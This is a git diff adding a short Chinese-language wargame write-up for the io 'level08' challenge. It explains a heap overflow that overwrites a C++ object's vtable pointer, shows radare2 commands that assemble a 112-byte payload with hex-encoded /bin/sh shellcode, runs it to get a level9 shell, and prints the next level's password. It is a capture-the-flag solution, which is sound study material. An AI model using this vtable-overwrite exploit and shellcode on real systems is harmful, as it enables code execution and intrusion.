summaryrefslogtreecommitdiff
path: root/level08
diff options
context:
space:
mode:
Diffstat (limited to 'level08')
-rw-r--r--level0818
1 files changed, 18 insertions, 0 deletions
diff --git a/level08 b/level08
new file mode 100644
index 0000000..12206d9
--- /dev/null
+++ b/level08
@@ -0,0 +1,18 @@
+用 gdb 调试,发现 five 和 six 在堆中的地址为 0x0804ea10 和 0x0804ea80. class Number 的虚表指针在对象的偏移 0 处,需要用 112 字节覆盖 six 的虚表指针。虚表指针的第一个字段(偏移为 0)为 operator+.
+
+试了下把 shellcode 写进 five->annotation 中,直接进 level9,看来这题堆区是可执行的。
+
+level8@io:~$ r2 malloc://512
+ -- Try with ASAN, and be amazed
+[0x00000000]> wxs 18ea0408
+[0x00000004]> wxs 31c004c9cd8089c389c189c231c004d0cd8031c0040bbb1f43583081f33030303053682f62696e89e331c931d2cd80
+[0x00000033]> 100 wxs 61
+[0x00000097]> wx 14ea0408 @ 108
+[0x00000097]> wtf /tmp/exp.bin 112 @ 0
+dumped 0x70 bytes
+Dumped 112 bytes from 0x00000000 into /tmp/exp.bin
+[0x00000097]> q
+
+level8@io:~$ /levels/level08 `cat /tmp/exp.bin`
+level9@io:/home/level8$ cat /home/level9/.pass
+ise9uHhjOhZd0K4G